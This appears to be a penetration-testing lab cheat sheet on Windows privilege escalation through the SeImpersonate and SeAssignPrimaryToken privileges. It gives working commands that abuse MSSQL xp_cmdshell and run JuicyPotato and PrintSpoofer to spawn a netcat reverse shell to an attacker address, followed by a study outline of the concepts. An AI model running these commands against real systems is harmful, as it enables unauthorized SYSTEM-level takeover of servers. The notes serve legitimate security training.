5.Seimpersonate-and-seassignprimarytoken

MSSQL Privilege Escalation

mssqlclient.py sql_dev@10.129.43.30 -windows-auth

Enable xp_cmdshell

enable_xp_cmdshell

Execute commands using xp_cmdshell

xp_cmdshell whoami
xp_cmdshell whoami /priv

Exploiting with JuicyPotato

xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

Start netcat listener

nc -lnvp 8443

Exploiting with PrintSpoofer

xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

• SeImpersonate Privilege:

  • Its purpose and how it's used to impersonate other user tokens.

  • How it's often abused for privilege escalation ("Potato" attacks).

• SeAssignPrimaryToken Privilege:

  • Its purpose and how it relates to process tokens.

• Token Impersonation:

  • The general concept of how process tokens work in Windows.

• Privilege Escalation via Service Accounts:

  • How service accounts with these privileges can be exploited.

  • Examples involving SQL Server and IIS.

• JuicyPotato:

  • Its use in exploiting SeImpersonate and SeAssignPrimaryToken.

  • Its limitations on newer Windows versions.

• PrintSpoofer:

  • An alternative to JuicyPotato for newer Windows versions.

  • Its use in exploiting impersonation privileges.

• MSSQL Exploitation:

  • Using xp_cmdshell to gain code execution.

  • Using mssqlclient.py to connect to a sql server.

• Reverse Shells:

  • Using netcat to catch reverse shells.